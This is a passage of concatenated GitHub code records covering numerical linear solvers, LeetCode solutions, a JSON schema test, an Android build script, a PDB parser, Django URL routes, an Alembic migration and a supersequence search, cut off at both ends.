agree')\r\n\tn=b.size\r\n\tx_old=np.transpose(np.matrix(np.zeros(n)))\r\n\tD=np.diag(np.diag(A))\r\n\tL=np.diag(np.diag(A,-1),-1)\r\n\tU=np.diag(np.diag(A,1),1)\r\n\tDL_inv=np.linalg.inv(D+L)\r\n\tconv=1\r\n\tcounter=0\r\n\twhile(conv>tol):\r\n\t\tx_new=DL_inv*(-U*x_old+b)\r\n\t\t#print(x_new)\r\n\t\tconv=np.linalg.norm(x_new-x_old)\r\n\t\tx_old=x_new\r\n\t\tcounter=counter+1\r\n\tprint('counter= '+str(counter))\r\n\tprint('absolute error = '+str(conv))\r\n\treturn(x_new)\r\n#####################################################################################################\r\n# c) SOR Method\r\ndef sor_solver(A, b, w=1.1, tol=1e-6):\r\n\tif(min(np.linalg.eigvals(A)<0)):\r\n\t\tsys.exit('A is not positive definite')\r\n\tif((A.transpose() != A).all()):\r\n\t\tsys.exit('A is not symmetric')\r\n\tif(b.size!=A.shape[0] or b.size!=A.shape[1]):\r\n\t\tsys.exit('dimensions of A and b do not 
#####################################################################################################\r\n# b) Gauss-Seidel Method\r\ndef gs_solver(A, b, tol=1e-6):\r\n\tif(min(np.linalg.eigvals(A))<=0):\r\n\t\tsys.exit('A is not positive definite')\r\n\tif((A.transpose() != A).any()):\r\n\t\tsys.exit('A is not symmetric')\r\n\tif(b.size!=A.shape[0] or b.size!=A.shape[1]):\r\n\t\tsys.exit('dimensions of A and b do not agree')\r\n\tn=b.size\r\n\tx_old=np.transpose(np.matrix(np.zeros(n)))\r\n\tD=np.diag(np.diag(A))\r\n\tL=np.diag(np.diag(A,-1),-1)\r\n\tU=np.diag(np.diag(A,1),1)\r\n\tDL_inv=np.linalg.inv(D+L)\r\n\tconv=1\r\n\tcounter=0\r\n\twhile(conv>tol):\r\n\t\tx_new=DL_inv*(-U*x_old+b)\r\n\t\t#print(x_new)\r\n\t\tconv=np.linalg.norm(x_new-x_old)\r\n\t\tx_old=x_new\r\n\t\tcounter=counter+1\r\n\tprint('counter= '+str(counter))\r\n\tprint('absolute error = '+str(conv))\r\n\treturn(x_new)\r\n#####################################################################################################\r\n# c) SOR Method\r\ndef sor_solver(A, b, w=1.1, tol=1e-6):\r\n\tif(min(np.linalg.eigvals(A))<=0):\r\n\t\tsys.exit('A is not positive definite')\r\n\tif((A.transpose() != A).any()):\r\n\t\tsys.exit('A is not symmetric')\r\n\tif(b.size!=A.shape[0] or b.size!=A.shape[1]):\r\n\t\tsys.exit('dimensions of A and b do not agree')\r\n\tn=b.size\r\n\tx_old=np.transpose(np.matrix(np.zeros(n)))\r\n\tD=np.diag(np.diag(A))\r\n\tL=np.diag(np.diag(A,-1),-1)\r\n\tU=np.diag(np.diag(A,1),1)\r\n\tDL_inv=np.linalg.inv(D+w*L)\r\n\tconv=1\r\n\tcounter=0\r\n\twhile(conv>tol):\r\n\t\tx_new=DL_inv*(((1-w)*D-w*U)*x_old+w*b)\r\n\t\t#print(x_new)\r\n\t\tconv=np.linalg.norm(x_new-x_old)\r\n\t\tx_old=x_new\r\n\t\tcounter=counter+1\r\n\tprint('counter= '+str(counter))\r\n\tprint('absolute error = '+str(conv))\r\n\treturn(x_new)\r\n#####################################################################################################\r\n# Script that executes when the program file is called from the command line.\r\nn=int(input(\"Enter number of equations in system: \"))\r\nA=matrix_build(n)\r\nb=b_build(n)\r\nprint('JACOBI SOLVER:')\r\njacobi_ans=jacobi_solver(A,b)\r\nprint('jacobi answer:')\r\nprint(jacobi_ans)\r\nprint('\\n')\r\n\r\nprint('GAUSS-SEIDEL SOLVER:')\r\ngs_ans=gs_solver(A,b)\r\nprint('gs answer:')\r\nprint(gs_ans)\r\nprint('\\n')\r\n\r\n\r\nprint('SOR SOLVER:')\r\nsor_ans=sor_solver(A,b)\r\nprint('sor answer:')\r\nprint(sor_ans)\r\nprint('\\n')\r\n","repo_name":"MilosAtz/NE155","sub_path":"HW5/P4.py","file_name":"P4.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"72547674139","text":"class Solution:\n def splitArraySameAverage(self, A: List[int]) -> bool:\n n = len(A)\n summ = sum(A)\n if not any(i * summ % n == 0 for i in range(1, n // 2 + 1)):\n return False\n\n sums = [set() for _ in range(n // 2 + 1)]\n sums[0].add(0)\n\n for a in A:\n for i in range(n // 2, 0, -1):\n for val in sums[i - 1]:\n sums[i].add(a + val)\n\n for i in range(1, n // 2 + 1):\n if i * summ % n == 0 and i * summ // n in sums[i]:\n return True\n\n return False\n","repo_name":"Next-Gen-UI/Code-Dynamics","sub_path":"Leetcode/0805. Split Array With Same Average/0805.py","file_name":"0805.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"69"}
+{"seq_id":"36007723142","text":"# encoding: utf-8\n\n\"\"\"\n@version: 1.0\n@author: dawning\n@contact: dawning7670@gmail.com\n@time: 2017/3/27 17:12\n\"\"\"\n\nimport pytest\nfrom jsonschema import SchemaError\nfrom jsonschema.validators import validator_for\n\nfrom framework.validator.json_validator import JValidator\n\nconfig_with_simple_json = {\n \"opr\": {\n \"type\": \"string\",\n \"enum\": [\"collection\", \"pay_for\"]\n }\n}\n\nschema_with_simple_json = {\n \"$schema\": \"http://json-schema.org/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"opr\": {\"type\": \"string\", \"enum\": [\"collection\", \"pay_for\"]}\n }\n}\n\nconfig_with_array = {\n \"opr\": {\n \"type\": \"string\",\n \"enum\": [\"collection\", \"pay_for\"]\n },\n \"item\": [{\n \"bank_account\": {\"type\": \"string\", \"maxLength\": 19, \"maxLength\": 19},\n \"bank_account_name\": {\"type\": \"string\", \"maxLength\": 10, \"maxLength\": 4}\n }, {\n \"maxLength\": 5,\n \"minLength\": 1\n }]\n}\nschema_with_array = {\n \"$schema\": \"http://json-schema.org/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"opr\": {\"type\": \"string\", \"enum\": [\"collection\", \"pay_for\"]},\n \"item\": {\n \"type\": \"array\",\n \"maxLength\": 5,\n \"minLength\": 1,\n \"items\": {\n \"type\": \"object\",\n \"properties\": {\n \"bank_account\": {\"type\": \"string\", \"maxLength\": 19, \"maxLength\": 19},\n \"bank_account_name\": {\"type\": \"string\", \"maxLength\": 10, \"maxLength\": 4}\n }\n }\n }\n }\n}\n\nconfig_with_not_required = {\n \"opr\": {\"type\": \"string\", \"enum\": [\"collection\", \"pay_for\"]},\n \"account\": {\"type\": \"string\", \"maxLength\": 10, \"minLength\": 1},\n \"remark\": {\"type\": \"string\"},\n \"user_name\": {\"type\": \"integer\", \"maximum\": 99999, \"minimum\": 10000},\n \"realtime\": {\"type\": \"integer\", \"enum\": [0, 1]},\n \"agreement_id\": {\"type\": \"string\", \"maxLength\": 16, \"maxLength\": 16},\n \"not_required\": [\"remark\", \"realtime\"]\n}\nschema_with_not_required = {\n \"$schema\": \"http://json-schema.org/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"opr\": {\"type\": \"string\", \"enum\": [\"collection\", \"pay_for\"]},\n \"account\": {\"type\": \"string\", \"maxLength\": 10, \"minLength\": 1},\n \"remark\": {\"type\": \"string\"},\n \"user_name\": {\"type\": \"integer\", \"maximum\": 99999, \"minimum\": 10000},\n \"realtime\": {\"type\": \"integer\", \"enum\": [0, 1]},\n \"agreement_id\": {\"type\": \"string\", \"maxLength\": 16, \"maxLength\": 16}\n },\n \"required\": ['account', 'agreement_id', 'opr', 'user_name']\n}\n\nconfig_with_nest_json = {\n \"opr\": {\"type\": \"string\", \"enum\": [\"collection\", \"pay_for\"]},\n \"account\": {\"type\": \"string\", \"maxLength\": 10, \"minLength\": 1},\n \"user\": {\n \"username\": {\"type\": \"string\"},\n \"password\": {\"type\": \"integer\", \"maximum\": 999999, \"minimum\": 100000}\n }\n}\nschema_with_nest_json = {\n \"$schema\": \"http://json-schema.org/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"opr\": {\"type\": \"string\", \"enum\": [\"collection\", \"pay_for\"]},\n \"account\": {\"type\": \"string\", \"maxLength\": 10, \"minLength\": 1},\n \"user\": {\n \"type\": \"object\",\n \"properties\": {\n \"username\": {\"type\": \"string\"},\n \"password\": {\"type\": \"integer\", \"maximum\": 999999, \"minimum\": 100000}\n }\n }\n }\n}\n\nconfig_with_whole = {\n \"opr\": {\"type\": \"string\", \"enum\": [\"collection\", \"pay_for\"]},\n \"account\": {\"type\": \"string\", 
\"maxLength\": 10, \"minLength\": 1},\n \"item\": [\n {\n \"bank_account\": {\"type\": \"string\", \"maxLength\": 19, \"minLength\": 19},\n \"bank_account_name\": {\"type\": \"string\", \"maxLength\": 10, \"minLength\": 4},\n \"not_required\": [\"bank_account_name\"]\n }, {\n \"maxLength\": 5,\n \"minLength\": 1\n }],\n \"user\": {\n \"username\": {\"type\": \"string\"},\n \"password\": {\"type\": \"integer\", \"maximum\": 999999, \"minimum\": 100000},\n \"not_required\": [\"username\"]\n },\n \"not_required\": [\"account\"]\n}\n\nschema_with_whole = {\n \"$schema\": \"http://json-schema.org/schema#\",\n \"type\": \"object\",\n \"properties\": {\n \"opr\": {\"type\": \"string\", \"enum\": [\"collection\", \"pay_for\"]},\n \"account\": {\"type\": \"string\", \"maxLength\": 10, \"minLength\": 1},\n \"item\": {\n \"type\": \"array\",\n \"items\": {\n \"type\": \"object\",\n \"properties\": {\n \"bank_account\": {\"type\": \"string\", \"maxLength\": 19, \"minLength\": 19},\n \"bank_account_name\": {\"type\": \"string\", \"maxLength\": 10, \"minLength\": 4}\n },\n \"required\": [\"bank_account\"]\n },\n \"maxLength\": 5,\n \"minLength\": 1\n },\n \"user\": {\n \"type\": \"object\",\n \"properties\": {\n \"username\": {\"type\": \"string\"},\n \"password\": {\"type\": \"integer\", \"maximum\": 999999, \"minimum\": 100000}\n },\n \"required\": [\"password\"]\n }\n },\n \"required\": [\"item\", \"opr\", \"user\"]\n}\nschema_config = {\n \"simple_json\": config_with_simple_json,\n \"array\": config_with_array,\n \"not_required\": config_with_not_required,\n \"nest_json\": config_with_nest_json,\n \"whole\": config_with_whole\n}\nvalidator = JValidator(schema_config)\n\n\ndef check(name, correct_schema):\n schema = validator.schema[name]\n cls = validator_for(schema)\n is_valid_schema = True\n try:\n cls.check_schema(schema)\n except SchemaError:\n is_valid_schema = False\n assert is_valid_schema\n assert schema == correct_schema\n\n\n# 测试单层json\ndef test_make_schema_with_simple_json():\n check(\"simple_json\", schema_with_simple_json)\n\n\n# 测试数组对象\ndef test_make_schema_with_array():\n check(\"array\", schema_with_array)\n\n\n# 测试not_required对象\ndef test_make_schema_with_not_required():\n check(\"not_required\", schema_with_not_required)\n\n\n# 测试嵌套json\ndef test_make_schema_with_nest_json():\n check(\"nest_json\", schema_with_nest_json)\n\n\n# 总体测试\ndef test_make_schema_whole():\n check(\"whole\", schema_with_whole)\n\n\nif __name__ == '__main__':\n args = [\"-vv\", \"--color\", \"yes\", \"test_json_validator.py\"]\n pytest.main(args)\n","repo_name":"lpj2721/protools","sub_path":"framework/tests/test_json_validator.py","file_name":"test_json_validator.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"24267196626","text":"import sys, os, shutil, subprocess, time, config\n\ndef buildWorkingDir():\n # Remove java gen folder\n if os.path.exists(config.javaGenDir):\n shutil.rmtree(config.javaGenDir)\n\n #Copy project template to build dir\n src = config.javaDir\n des = config.javaGenDir + os.sep + \"_asproject\"\n if os.path.exists(des):\n shutil.rmtree(des)\n \n print(\"\\033[1;34;40mFrom\\n\\033[0;37;40m\" + src)\n print(\"\\033[1;34;40mTo\\n\\033[0;37;40m\" + des)\n\n shutil.copytree(src, des)\n\n #Copy packed_data to _asproject\n src = config.dataGenDir + os.sep + \"packed_data.zip\"\n des = des + os.sep + \"app\" + os.sep + \"src\" + os.sep + \"main\" + os.sep + \"assets\"\n if os.path.exists(src):\n shutil.copy(src, des)\n\n \n print(\"\\n\")\n \ndef buildJava():\n print(\"===========================================================\")\n print(\" \\033[1;32;40mBUILD JAVA\\033[0;37;40m\")\n print(\"===========================================================\")\n\n if config.hostType == \"windows\":\n gradleExec = config.gradleExecWin\n elif config.hostType == \"linux\":\n gradleExec = config.gradleExecLinux\n \n if config.buildType == \"release\":\n cmd = config.javaDir + os.sep + gradleExec + \" assembleRelease -p \" + config.javaGenDir + os.sep + \"_asproject\" + \" --profile\"\n subprocess.call(cmd, shell=True)\n #Enable in next version\n #cmd = config.javaDir + os.sep + gradleExec + \" testReleaseUnitTest -p \" + config.javaGenDir + os.sep + \"_asproject\"\n #subprocess.call(cmd, shell=True)\n else:\n cmd = config.javaDir + os.sep + gradleExec + \" assembleDebug -p \" + config.javaGenDir + os.sep + \"_asproject\" + \" --profile\"\n subprocess.call(cmd, shell=True)\n #Enable in next version\n #cmd = config.javaDir + os.sep + gradleExec + \" testDebugUnitTest -p \" + config.javaGenDir + os.sep + \"_asproject\"\n #subprocess.call(cmd, shell=True)\n #print(cmd)\n #subprocess.call(cmd, shell=True)\n \n print(\"\\n\")\n\ndef buildPackage():\n print(\"===========================================================\")\n print(\" \\033[1;32;40mBUILD PACKAGE\\033[0;37;40m\")\n print(\"===========================================================\")\n \n if config.buildType == \"release\":\n src = config.javaGenDir + os.sep + \"_asproject\" + os.sep + \"app\" + os.sep + \"build\" + os.sep + \"outputs\" + os.sep + \"apk\" + os.sep + \"release\" + os.sep + \"app-release.apk\"\n des = config.rootGenDir + os.sep + \"apks\"\n \n print(\"\\033[1;34;40mFrom:\\n\\033[0;37;40m\" + src)\n print(\"\\033[1;34;40mTo\\n\\033[0;37;40m\" + des)\n \n if not os.path.exists(des):\n os.mkdir(des)\n des += os.sep + config.outputFile + \"-\" + config.versionCode + \"-\" + config.versionName + \"-release.apk\"\n shutil.copyfile(src, des)\n else:\n src = config.javaGenDir + os.sep + \"_asproject\" + os.sep + \"app\" + os.sep + \"build\" + os.sep + \"outputs\" + os.sep + \"apk\" + os.sep + \"debug\" + os.sep + \"app-debug.apk\"\n des = config.rootGenDir + os.sep + \"apks\"\n \n print(\"\\033[1;34;40mFrom:\\n\\033[0;37;40m\" + src)\n print(\"\\033[1;34;40mTo\\n\\033[0;37;40m\" + des)\n \n if not os.path.exists(des):\n os.mkdir(des)\n des += os.sep + config.outputFile + \"-\" + config.versionCode + \"-\" + config.versionName + \"-debug.apk\"\n shutil.copyfile(src, des)\n\n \n print(\"\\n\")\n\ndef main(argv):\n start = time.time()\n print(\"===========================================================\")\n print(\" \\033[1;32;40mBUILD APPLICATION\\033[0;37;40m\")\n 
print(\"===========================================================\")\n \n print(str(argv))\n config.buildProjectPath(argv[0], argv[1], argv[2], argv[3])\n \n buildWorkingDir()\n \n buildJava()\n \n buildPackage()\n\n elapsedTime = time.time() - start\n print(\"Running time: %s s\" % str(elapsedTime))\n\nif __name__ == '__main__':\n main(sys.argv[1:])","repo_name":"cs50vn/virustracker-android","sub_path":"scripts/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":4054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"24321580296","text":"import numpy as np\nimport pandas as pd\nimport sys\nimport os\nimport pickle\nimport itertools\nfrom tqdm import tqdm\nfrom scipy.spatial.distance import squareform, pdist\n\n\"\"\"\nSimple .pdb parser for collecting spatial info of atoms and such. \n\"\"\"\n\nAA_LIST = [\"ALA\", \"ARG\", \"ASN\", \"ASP\", \"CYS\", \"GLN\", \"GLU\", \"GLY\", \"HIS\",\n \"ILE\", \"LEU\", \"LYS\", \"MET\", \"PHE\", \"PRO\", \"SER\", \"THR\", \"TRP\",\n \"TYR\", \"VAL\"]\n\n\ndef parse_pdb_file(protein_name, filepath):\n print(filepath)\n lines = open(filepath, 'r').readlines()\n atom_name = []\n residue_name = []\n residue_number = []\n x_coord = []\n y_coord = []\n z_coord = []\n element = []\n for line in lines:\n if line[0:7].strip() == \"ATOM\":\n atom_name.append(line[13:17].strip())\n residue_name.append(line[17:21].strip())\n residue_number.append(int(line[23:26].strip()))\n x_coord.append(float(line[31:39].strip()))\n y_coord.append(float(line[39:47].strip()))\n z_coord.append(float(line[47:55].strip()))\n element.append(line[77:79].strip())\n protein = pd.DataFrame({\n 'atom_name': atom_name,\n 'residue_name': residue_name,\n 'residue_number': residue_number,\n 'x': x_coord,\n 'y': y_coord,\n 'z': z_coord,\n 'element': element})\n protein['aa_index'] = protein[\"residue_name\"].apply(\n lambda x: AA_LIST.index(x))\n\n with open(\"processed_pdb/\" + protein_name[:-4] + \"_dataset.pkl\", \"wb\") as f:\n pickle.dump(protein, f)\n return protein\n\n\ndef filter_dataset_CA(protein_name, dataset, save=True):\n \"\"\"\n Filter only the CA atoms from a given dataset.\n Returns the list of datasets. \n \"\"\"\n filtered_dataset = dataset[dataset[\"atom_name\"] == \"CA\"]\n if save:\n with open(\"processed_pdb/\" + protein_name + \"_CA_data.pkl\", \"wb\") as f:\n pickle.dump(filtered_dataset, f)\n return filtered_dataset\n\n\ndef make_coordinate_dataset_CA(protein_name, dataset):\n \"\"\"\n Returns only the coordinates of a dataset.\n \"\"\"\n filtered_dataset = filter_dataset_CA(protein_name, dataset, False)\n coordinates = filtered_dataset[[\"x\", \"y\", \"z\"]].values\n coordinates -= coordinates.mean(axis=0)\n coordinates /= np.linalg.norm(coordinates, axis=0)\n data_coords = pd.DataFrame(coordinates,\n columns=(\"x\", \"y\", \"z\"))\n with open(\"processed_pdb/\" + protein_name + \"_CA_coords.pkl\", \"wb\") as f:\n pickle.dump(data_coords, f)\n return data_coords\n\n\ndef process_distance_matrix_CA_scipy(protein_name, dataset):\n filtered_dataset = filter_dataset_CA(protein_name, dataset, False)\n dist_matrix = squareform(pdist(filtered_dataset[[\"x\", \"y\", \"z\"]], metric='euclidean'))\n with open(\"processed_pdb/\" + protein_name + \"_CA_dist.pkl\", \"wb\") as f:\n pickle.dump(dist_matrix, f)\n return dist_matrix\n\n\ndef process_distance_matrix_CA(protein_name, dataset):\n filtered_dataset = filter_dataset_CA(protein_name, dataset, False)\n N = len(filtered_dataset)\n dist_matrix = np.zeros((N, N))\n for i, j in tqdm(itertools.combinations(range(N), 2)):\n a = np.array([filtered_dataset.iloc[i][\"x\"],\n filtered_dataset.iloc[i][\"y\"],\n filtered_dataset.iloc[i][\"z\"]])\n b = np.array([filtered_dataset.iloc[j][\"x\"],\n filtered_dataset.iloc[j][\"y\"],\n filtered_dataset.iloc[j][\"z\"]])\n dist_matrix[i][j] = np.linalg.norm(a - b)\n dist_matrix[j][i] = dist_matrix[i][j]\n with open(\"processed_pdb/\" + protein_name + \"_CA_dist.pkl\", \"wb\") as f:\n pickle.dump(dist_matrix, f)\n return dist_matrix\n\n\ndef unload_all(directory=\"processed_pdb\"):\n with 
open(directory + \"/names.pkl\", 'rb') as f:\n names = pickle.load(f)\n datasets = []\n filtered_datasets = []\n data_coords = []\n dist_matrices = []\n for name in names:\n with open(\"processed_pdb/\" + name + \"_dataset.pkl\", \"rb\") as f:\n datasets.append(pickle.load(f))\n with open(\"processed_pdb/\" + name + \"_CA_data.pkl\", \"rb\") as f:\n filtered_datasets.append(pickle.load(f))\n with open(\"processed_pdb/\" + name + \"_CA_coords.pkl\", \"rb\") as f:\n data_coords.append(pickle.load(f))\n with open(\"processed_pdb/\" + name + \"_CA_dist.pkl\", \"rb\") as f:\n dist_matrices.append(pickle.load(f))\n return names, datasets, filtered_datasets, data_coords, dist_matrices\n\n\nif __name__ == \"__main__\":\n if not os.path.exists(\"processed_pdb\"):\n os.makedirs(\"processed_pdb\")\n if len(sys.argv) == 1:\n directory = \"pdb_files\"\n else:\n directory = sys.argv[1]\n items = os.listdir(directory)\n files = []\n names = []\n datasets = []\n for name in items:\n if name.endswith(\".pdb\"):\n files.append(name)\n names.append(name[: -4])\n\n for name in files:\n protein = parse_pdb_file(name, directory + \"/\" + name)\n datasets.append(protein)\n \n with open(\"processed_pdb\" + \"/names.pkl\", 'wb') as f:\n pickle.dump(names, f)\n \n namefile = open(\"processed_pdb/names.txt\", 'w')\n\n for i, name in enumerate(names):\n namefile.write(name + \"\\n\")\n _ = filter_dataset_CA(name, datasets[i])\n _ = make_coordinate_dataset_CA(name, datasets[i])\n _ = process_distance_matrix_CA_scipy(name, datasets[i])\n","repo_name":"carlidel/protein-reconstruction","sub_path":"pdb_processing.py","file_name":"pdb_processing.py","file_ext":"py","file_size_in_byte":5427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23567532880","text":"\"\"\"GestaoDePraticasDiarias_v6 URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n #========== VERB ==========#\n path('verbs/', views.ListVerb.as_view(), name='verb_list'),\n path('verb/', views.DetailVerb.as_view(), name='verb_detail'),\n path('create_verb/', views.CreateVerb.as_view(), name='verb_create'),\n path('update_verb/',\n views.UpdateVerb.as_view(),\n name='verb_update'),\n path('delete_verb/',\n views.DeleteVerb.as_view(),\n name='verb_delete'),\n #========== VERB ==========#\n \n \n \n #========== SENTENCE ==========#\n path('sentences/', views.ListSentence.as_view(), name='sentence_list'),\n path('sentence/', views.DetailSentence.as_view(),\n name='sentence_detail'),\n path('create_sentence/', views.CreateSentence.as_view(),\n name='sentence_create'),\n path('update_sentence/',\n views.UpdateSentence.as_view(),\n name='sentence_update'),\n path('delete_sentence/',\n views.DeleteSentence.as_view(),\n name='sentence_delete'),\n #========== SENTENCE ==========#\n \n \n \n #========== GROUP ==========#\n path('groups/', views.ListGroup.as_view(), name='group_list'),\n path('group/', views.DetailGroup.as_view(),\n name='group_detail'),\n path('create_group/', views.CreateGroup.as_view(),\n name='group_create'),\n path('update_group/',\n views.UpdateGroup.as_view(),\n name='group_update'),\n path('delete_group/',\n views.DeleteGroup.as_view(),\n name='group_delete'),\n #========== GROUP ==========#\n\n \n \n #========== PATTERN ==========#\n path('patterns/', views.ListPattern.as_view(), name='pattern_list'),\n path('pattern/', views.DetailPattern.as_view(),\n name='pattern_detail'),\n path('create_pattern/', views.CreatePattern.as_view(),\n name='pattern_create'),\n path('update_pattern/',\n views.UpdatePattern.as_view(),\n name='pattern_update'),\n path('delete_pattern/',\n views.DeletePattern.as_view(),\n name='pattern_delete'),\n #========== PATTERN ==========#\n \n \n \n #========== RESOURCE ==========#\n path('resources/', views.ListResource.as_view(), name='resource_list'),\n path('resource/', views.DetailResource.as_view(),\n name='resource_detail'),\n path('create_resource/', views.CreateResource.as_view(),\n name='resource_create'),\n path('update_resource/',\n views.UpdateResource.as_view(),\n name='resource_update'),\n path('delete_resource/',\n views.DeleteResource.as_view(),\n name='resource_delete'),\n #========== RESOURCE ==========#\n \n \n \n #========== ARTEFACT ==========#\n path('artefacts/', views.ListArtefact.as_view(), name='artefact_list'),\n path('artefact/', views.DetailArtefact.as_view(),\n name='artefact_detail'),\n path('create_artefact/', views.CreateArtefact.as_view(),\n name='artefact_create'),\n path('update_artefact/',\n views.UpdateArtefact.as_view(),\n name='artefact_update'),\n path('delete_artefact/',\n views.DeleteArtefact.as_view(),\n name='artefact_delete'),\n #========== ARTEFACT 
==========#\n]\n","repo_name":"fosquito/Daily-practice-management","sub_path":"Activities/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"20200250185","text":"file = open(\"12-1.in\", \"r\")\n# file = open(\"12-1.in.sample\", \"r\")\n\ndef parse_node(node_id, children):\n for child in children:\n if child not in connected:\n connected.add(child)\n parse_node(child, connections[child])\n\nconnections = {}\nfor line in file:\n node_id, con_str = line.strip().split(\" <-> \")\n connections[int(node_id)] = [int(x) for x in con_str.split(\", \")]\n\nconnected = set()\nset_count = 1\nparse_node(0, connections[0])\nfor i in range(2000):\n if i not in connected:\n set_count += 1\n parse_node(i, connections[i])\n\nprint(len(connected))\nprint(set_count)\n","repo_name":"davidkiger/aoc2017","sub_path":"12-2.py","file_name":"12-2.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38613292114","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n # Sol 1. DFS Pre-Order Traverse\n def sumNumbers(self, root: TreeNode) -> int:\n if not root:\n return 0\n \n each_path = []\n total_path_sum = 0\n \n def pre_order_traverse(node, so_far):\n if not node.left and not node.right: # means it reaches the end of each leaf\n each_path.append(\"\".join(so_far+[str(node.val)]))\n \n if node.left: # means it goes to the left subtree\n pre_order_traverse(node.left, so_far+[str(node.val)])\n \n if node.right: # right subtree\n pre_order_traverse(node.right, so_far+[str(node.val)])\n \n pre_order_traverse(root,[])\n \n # print(each_path)\n \n for x in each_path:\n total_path_sum += int(x)\n \n return total_path_sum\n # TC: O(n), need to check all element\n # SC: O(g), where g is the number of leaf node. g = ceil(n/2)\n # Runtime: 28 ms, faster than 87.12%\n # Memory Usage: 14 MB, less than 38.06% ","repo_name":"ssong86/leetcode-problem-solving","sub_path":"June-LeetCoding-Challenge-2020/Week4/129-sum-root-to-leaf-numbers.py","file_name":"129-sum-root-to-leaf-numbers.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36613126414","text":"\"\"\"create topics table\n\nRevision ID: 6f247da76f69\nRevises: \nCreate Date: 2023-07-07 17:07:31.443571\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"01_6f247da76f69\"\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n op.create_table(\n \"topics\",\n sa.Column(\"id\", sa.UUID(), nullable=False, primary_key=True, index=True),\n sa.Column(\n \"created_at\",\n sa.DateTime(timezone=True),\n nullable=False,\n server_default=sa.func.now(),\n ),\n sa.Column(\n \"last_modified_at\",\n sa.DateTime(timezone=True),\n nullable=True,\n onupdate=sa.func.now(),\n ),\n sa.Column(\"description\", sa.String(length=250), nullable=True),\n sa.Column(\n \"is_deleted\", sa.Boolean(), nullable=False, server_default=sa.false()\n ),\n sa.Column(\"title\", sa.String(length=128), nullable=False),\n sa.Column(\"topic_id\", sa.UUID(), nullable=True),\n sa.ForeignKeyConstraint(\n [\"topic_id\"],\n [\"topics.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n\n\ndef downgrade() -> None:\n op.drop_index(op.f(\"ix_topics_id\"), table_name=\"topics\")\n op.drop_table(\"topics\")\n","repo_name":"dannytannertantrum/quiz-app","sub_path":"backend/alembic/versions/01_6f247da76f69_create_topics_table.py","file_name":"01_6f247da76f69_create_topics_table.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18926545945","text":"def calculate_metrics(TP, FP, TN, FN):\n recall = TP / (TP + FN)\n \n accuracy = (TP + TN) / (TP + TN + FP + FN)\n \n precision = TP / (TP + FP)\n \n f1_score = (2 * precision * recall) / (precision + recall)\n \n return recall, accuracy, precision, f1_score\n\n# TP, FP, TN, FN values\nTP= 138 \nFP= 4\nTN= 175\nFN= 58\n\nrecall, accuracy, precision, f1_score = calculate_metrics(TP, FP, TN, FN)\n\nprint(\"Recall:\", recall)\nprint(\"Precision:\", precision)\nprint(\"Accuracy:\", accuracy)\nprint(\"F1 Score:\", f1_score)\n","repo_name":"REVVVY/Breathing_Bag_Defect","sub_path":"scripts/metrics_calc.py","file_name":"metrics_calc.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4844441549","text":"import math\nimport copy\nimport time\nimport sys\nimport random\nimport copy\n#Smallest supersequence found so far\nbest_string = None\n#Length of smallest supersequence\nbest_string_length = math.inf\nstarting_time = None\nticks = 0\nticks_max = 1000\n#Adds substring to end of string\ndef add_substring(string, substring):\n if substring in string:\n return string\n length = len(substring)\n while(True):\n if string[-length:] == substring[:length]:\n string += substring[length:]\n break\n length -= 1\n return string\n\ndef permutation_string(permutation, substrings):\n string = ''\n for number in permutation:\n string = add_substring(string, substrings[number])\n return string\n\ndef swap_permutation(permutation, swap_number):\n new_permutation = copy.deepcopy(permutation)\n new_permutation[swap_number], new_permutation[swap_number + 1] = new_permutation[swap_number + 1], new_permutation[swap_number]\n return new_permutation\n\n#DFS search for smallest supersequence. Runs for a max of 10 seconds\ndef complete_DFS(string, substrings, search_time=10):\n global best_string\n global best_string_length\n global ticks\n ticks += 1\n if ticks == ticks_max:\n current_time = time.time()\n if current_time - starting_time > search_time:\n output_best()\n ticks = 0\n #Calculate if string generated is the smallest found\n if not substrings:\n string_length = len(string)\n if string_length < best_string_length:\n best_string = string\n best_string_length = string_length\n substring_tries = [(substring, 